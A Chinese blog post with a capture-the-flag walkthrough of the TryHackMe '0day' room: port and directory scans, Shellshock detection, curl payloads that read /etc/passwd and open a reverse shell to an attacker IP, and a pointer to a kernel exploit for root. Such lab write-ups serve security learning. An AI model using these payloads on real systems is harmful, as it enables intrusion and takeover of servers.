首页 > 其他分享 >0day

0day

时间:2023-06-23 16:12:06浏览次数:54  
标签:cgi Status http 301 0day bin

来源THM
0day

利用 Ubuntu,就像飓风中的乌龟一样

nmap端口扫描

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
|   2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
|   256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
|_  256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (EdDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 0day

只有22和80

gobuster目录扫描

/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/backup (Status: 301)
/cgi-bin (Status: 301)
/cgi-bin/ (Status: 403)
/css (Status: 301)
/img (Status: 301)
/js (Status: 301)
/robots.txt (Status: 200)
/secret (Status: 301)
/server-status (Status: 403)
/uploads (Status: 301)

在/backup/目录下找到一个ssh文件,下载到本地用ssh2john破解

不过没什么用,没有用户名。

因为目录由cgi-bin,于是我想到了nikto进探测

+ /cgi-bin/test.cgi: Uncommon header '93e4r0-cve-2014-6271' found, with contents: true.
+ /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278

出现了这样一条,并且可以访问

利用方式:
https://github.com/opsxcq/exploit-CVE-2014-6271
https://www.exploit-db.com/exploits/34900

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://10.10.47.227/cgi-bin/test.cgi

弹shell

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.13.18.193/1234 0>&1'" \                              
http://10.10.47.227/cgi-bin/test.cgi

特权升级

uname -a 
ubuntu 3.13.0-32-generic

利用:https://www.exploit-db.com/exploits/37292

gcc: error trying to exec 'cc1': execvp: No such file or directory


其中需要给gcc配环境变量
export PATH=/usr/bin:$PATH

此时为root

更多:https://muirlandoracle.co.uk/2020/09/03/0day-writeup/

标签:cgi,Status,http,301,0day,bin
From: https://www.cnblogs.com/-Lucky-/p/17499248.html

相关文章

  • Cisco RV32X系列路由器 从1day分析到0day挖掘
    前言拿到一个iot设备,笔者比较喜欢先去看一下它的历史漏洞,也许可以从中得到一些启发。发现Cisco之前修补过这个系列设备的命令注入漏洞。https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-command-inject-BY4c5zd1day分析因为漏洞......
  • 一分钟带你了解如何防范0day攻击!
    在网络安全体系中,0day通常是指还没有补丁的漏洞,而0day攻击则是指利用0day漏洞进行的攻击。该攻击方式影响范围大,具有广泛性,而且传统防御手段无法检测,因此防护0day攻击便......
  • c语言提高学习笔记——03-c提高10day_数据结构
    在学习c语言提高-数据结构总结了笔记,并分享出来。有问题请及时联系博主:​​Alliswell_WP​​,转载请注明出处。03-c提高10day_数据结构目录:一、队列(Queue)1、队列基本概念2......
  • 畅捷通0day勒索攻击事件 几个IOC都只是漏洞的 勒索病毒本身没有看到ioc
    畅捷通0day勒索攻击事件关联归因及产品解决方案时间:  2022年08月30日  1.概述近期,畅捷通T+软件的0day漏洞,被“魔笛”黑客组织利用进行勒索攻击活动,引起较大社会......
  • 0day安全:软件漏洞技术分析-Crack小实验
    Crack小实验#include<stdio.h>#definePASSWORD"1234567"intverify_password(char*password){ intauthenticated; authenticated=strcmp(password,PASSWORD)......
  • #100daysofcode
    #100daysofcodeR1D9Photoby瓦列里·西索耶夫on不飞溅学习做了一些触摸打字课。这有助于输入大量代码以下来源文档中只能有一个body元素<body></body>......
  • #100daysofcode
    #100daysofcodeR1D9Photoby瓦列里·西索耶夫on不飞溅学习做了一些触摸打字课。这有助于输入大量代码以下来源文档中只能有一个body元素<body></body>......
  • 这个Python 0day 已存在15年,已影响超过35万个开源项目
    这个Python0day已存在15年,已影响超过35万个开源项目https://mp.weixin.qq.com/s/-00LEYzwa9HFg3Oam7LJqw这个Python0day已存在15年,已影响超过35万个开源项目RavieL......
  • #100daysofcode
    #100daysofcodeR1D3问题在html中创建样式元素是否意味着我现在正在输入CSS?<style>元素{适当的价值;</style><style>h1{文本对齐:居中;</......
  • #100daysofcode
    #100daysofcodeR1D3问题在html中创建样式元素是否意味着我现在正在输入CSS?<style>元素{适当的价值;</style><style>h1{文本对齐:居中;</......